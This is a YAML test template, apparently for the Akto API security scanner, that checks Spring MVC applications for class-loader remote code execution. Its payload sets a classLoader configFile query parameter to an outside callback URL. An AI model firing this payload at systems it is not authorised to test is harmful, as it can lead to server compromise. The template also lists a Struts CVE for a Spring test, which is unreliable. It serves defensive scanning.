---
id: FRAMEWORK_RCE_SPRING_MVC
info:
  name: "Framework RCE - Spring MVC"
  description: "Tests whether Spring MVC applications are vulnerable to Remote Code Execution through class loader manipulation."
  details: "This test attempts to exploit Spring MVC RCE vulnerabilities by manipulating class loader resources and checking for SSRF hits that confirm code execution."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_SPRING_MVC
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94
  cve:
    - CVE-2021-31805

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0

execute:
  type: single
  requests:
    - req:
        - send_ssrf_req:
            url: "https://test-services.akto.io/store_uuid/${random_uuid}"
        - modify_method: GET
        - add_query_param:
            "class.module.classLoader.resources.context.configFile": "https://test-services.akto.io/${random_uuid}"
        - replace_body: '{}'

validate:
  or:
    # SSRF hit confirms RCE attempt
    - ssrf_url_hit: ${random_uuid}
    # Or check for Java-specific indicators
    - response_payload:
        contains_either:
          - "java"
          - "Java"
          - "Exception"
          - "Error"
        not_contains:
          - "SQL syntax error"
          - "You have an error in your SQL"
  response_headers:
    for_one:
      key:
        eq: "user-agent"
      value:
        eq: "java"
